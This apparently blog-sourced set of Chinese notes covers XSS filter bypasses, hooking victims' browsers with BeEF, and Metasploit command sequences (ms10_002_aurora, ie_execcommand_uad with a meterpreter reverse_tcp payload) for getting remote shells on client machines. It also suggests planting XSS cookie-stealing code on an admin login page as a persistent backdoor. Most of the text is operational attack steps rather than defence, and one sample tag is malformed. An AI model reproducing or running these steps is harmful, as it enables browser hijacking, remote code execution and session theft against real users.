XSS 绕过限制:
1, 绕过 magic_quotes_gpc
可使用 javascript 中的 String.fromCharCode()
<script>String.fromCharCode()</scrip>
2,HEX 编码
十六进制编码
- https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
- https://www.asciitohex.com/
3, 改变大小写
4, 关闭标签
5,AWVS 扫描
Kali Linux Beef 劫持客户端浏览器:
cd /usr/share/beef-xss 进入目录
ls 查看目录
./beef 运行 beef
UI URL: 管理 网址浏览器打开 账号密码默认 beef
Hook URL: 恶意代码
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser
beef+msf 拿客户端 shell (ie6 xp)
cd /usr/share/beef-xss 进入目录
./ beef 运行 beef
msfconsole 运行 msf
msf 下执行:
- use windows/browser/ms10_002_aurora
- set PAYLOAD windows/meterpreter/reverse_tcp
- show options
set SRVHOST 客户端将要访问的 IP
set SRVPORT 将要访问的端口
set URIPATH / 网站根目录
set LHOST 客户端回连 IP
set LPORT 客户端回连端口
exploit
Using URL 为要让客户端访问的 url,beef 里设置
session -i 查看得到的 shell
session -1 id 查看固定 id 的 shell
shell 拿到权限
beef+msf 拿客户端 shell (ie7,8,9)
msf 下
- use exploit/windows/browser/ie_execcommand_uad
- show options
set SRVHOST 回连 ip
set SRVPORT 回连端口
- set URIPATH /
- exploit
XSS 漏洞扫描工具
WVS
椰树
- safe3
- Xelenium
- w3af
- vega
xss 扫描插件 + burp
长期留后门, 可将 XSS 获取 cookie 代码留在管理登录页面
Xss 平台搭建
使用工具:
wamp2.2+xss.me 源码
来源: http://www.bubuko.com/infodetail-2682239.html